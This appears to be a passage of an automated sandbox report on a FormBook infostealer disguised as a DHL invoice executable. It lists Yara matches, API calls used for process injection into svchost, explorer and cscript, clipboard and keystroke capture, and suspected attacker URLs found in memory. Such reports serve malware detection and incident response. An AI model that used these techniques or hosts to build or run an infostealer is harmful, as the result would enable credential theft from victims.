Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uhug.xyz/jd21/www.crucka.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uhug.xyzReferer:
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

0_2_012BEAFF

Contains functionality to modify clipboard data

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012BED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_012BED6A

Contains functionality to read the clipboard data

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

0_2_012BEAFF

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012AAB9C GetKeyState,GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_012AAB9C

Potential key logger detected (key state polling based)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

0_2_012D9576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe PID: 2412, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 236, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cscript.exe PID: 1368, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_22b1eab7-2
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_a398b267-a
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_0ace506a-3
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_206c2ff5-4

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A350 NtCreateFile,	2_2_0041A350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A400 NtReadFile,	2_2_0041A400
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A480 NtClose,	2_2_0041A480
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A530 NtAllocateVirtualMemory,	2_2_0041A530
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A47A NtClose,	2_2_0041A47A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00730078 NtResumeThread,LdrInitializeThunk,	2_2_00730078
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_00730048
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007300C4 NtCreateFile,LdrInitializeThunk,	2_2_007300C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072F900 NtReadFile,LdrInitializeThunk,	2_2_0072F900
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072F9F0 NtClose,LdrInitializeThunk,	2_2_0072F9F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk,	2_2_0072FAE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_0072FAD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_0072FB68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk,	2_2_0072FBB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk,	2_2_0072FC60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_0072FC90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_0072FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FD8C NtDelayExecution,LdrInitializeThunk,	2_2_0072FD8C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_0072FED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_0072FEA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FFB4 NtCreateSection,LdrInitializeThunk,	2_2_0072FFB4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00730060 NtQuerySection,	2_2_00730060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073010C NtOpenDirectoryObject,	2_2_0073010C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007301D4 NtSetValueKey,	2_2_007301D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007307AC NtCreateMutant,	2_2_007307AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00730C40 NtGetContextThread,	2_2_00730C40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007310D0 NtOpenProcessToken,	2_2_007310D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00731148 NtOpenThread,	2_2_00731148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072F8CC NtWaitForSingleObject,	2_2_0072F8CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00731930 NtSetContextThread,	2_2_00731930
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072F938 NtWriteFile,	2_2_0072F938
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FA50 NtEnumerateValueKey,	2_2_0072FA50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FA20 NtQueryInformationFile,	2_2_0072FA20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FAB8 NtQueryValueKey,	2_2_0072FAB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FB50 NtCreateKey,	2_2_0072FB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FBE8 NtQueryVirtualMemory,	2_2_0072FBE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FC48 NtSetInformationFile,	2_2_0072FC48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FC30 NtOpenProcess,	2_2_0072FC30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FD5C NtEnumerateKey,	2_2_0072FD5C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00731D80 NtSuspendThread,	2_2_00731D80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FE24 NtWriteVirtualMemory,	2_2_0072FE24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FF34 NtQueueApcThread,	2_2_0072FF34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FFFC NtCreateProcessEx,	2_2_0072FFFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,	2_2_0038A036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038A042 NtQueryInformationProcess,	2_2_0038A042
Source: C:\Windows\explorer.exe	Code function: 3_2_0909EE12 NtProtectVirtualMemory,	3_2_0909EE12
Source: C:\Windows\explorer.exe	Code function: 3_2_0909D232 NtCreateFile,	3_2_0909D232
Source: C:\Windows\explorer.exe	Code function: 3_2_0909EE0A NtProtectVirtualMemory,	3_2_0909EE0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020900C4 NtCreateFile,LdrInitializeThunk,	4_2_020900C4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020907AC NtCreateMutant,LdrInitializeThunk,	4_2_020907AC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FAB8 NtQueryValueKey,LdrInitializeThunk,	4_2_0208FAB8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_0208FAD0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FAE8 NtQueryInformationProcess,LdrInitializeThunk,	4_2_0208FAE8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FB50 NtCreateKey,LdrInitializeThunk,	4_2_0208FB50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FB68 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_0208FB68
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FBB8 NtQueryInformationToken,LdrInitializeThunk,	4_2_0208FBB8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208F900 NtReadFile,LdrInitializeThunk,	4_2_0208F900
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208F9F0 NtClose,LdrInitializeThunk,	4_2_0208F9F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_0208FED0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FFB4 NtCreateSection,LdrInitializeThunk,	4_2_0208FFB4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FC60 NtMapViewOfSection,LdrInitializeThunk,	4_2_0208FC60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FD8C NtDelayExecution,LdrInitializeThunk,	4_2_0208FD8C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FDC0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_0208FDC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02090048 NtProtectVirtualMemory,	4_2_02090048
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02090060 NtQuerySection,	4_2_02090060
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02090078 NtResumeThread,	4_2_02090078
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209010C NtOpenDirectoryObject,	4_2_0209010C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020901D4 NtSetValueKey,	4_2_020901D4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02090C40 NtGetContextThread,	4_2_02090C40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020910D0 NtOpenProcessToken,	4_2_020910D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02091148 NtOpenThread,	4_2_02091148
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FA20 NtQueryInformationFile,	4_2_0208FA20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FA50 NtEnumerateValueKey,	4_2_0208FA50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FBE8 NtQueryVirtualMemory,	4_2_0208FBE8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208F8CC NtWaitForSingleObject,	4_2_0208F8CC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208F938 NtWriteFile,	4_2_0208F938
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02091930 NtSetContextThread,	4_2_02091930
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FE24 NtWriteVirtualMemory,	4_2_0208FE24
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FEA0 NtReadVirtualMemory,	4_2_0208FEA0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FF34 NtQueueApcThread,	4_2_0208FF34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FFFC NtCreateProcessEx,	4_2_0208FFFC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FC30 NtOpenProcess,	4_2_0208FC30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FC48 NtSetInformationFile,	4_2_0208FC48
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FC90 NtUnmapViewOfSection,	4_2_0208FC90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FD5C NtEnumerateKey,	4_2_0208FD5C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02091D80 NtSuspendThread,	4_2_02091D80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009A350 NtCreateFile,	4_2_0009A350
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009A400 NtReadFile,	4_2_0009A400
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009A480 NtClose,	4_2_0009A480
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009A530 NtAllocateVirtualMemory,	4_2_0009A530
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009A47A NtClose,	4_2_0009A47A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005BA036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,	4_2_005BA036
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	4_2_005B9BAF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005BA042 NtQueryInformationProcess,	4_2_005BA042
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_005B9BB2

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012AD5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_012AD5EB

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

0_2_012A1201

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012AE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_012AE8F6

Detected potential crypto function

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01248060	0_2_01248060
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B2046	0_2_012B2046
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012A8298	0_2_012A8298
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0127E4FF	0_2_0127E4FF
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0127676B	0_2_0127676B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012D4873	0_2_012D4873
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0126CAA0	0_2_0126CAA0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0124CAF0	0_2_0124CAF0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01276DD9	0_2_01276DD9
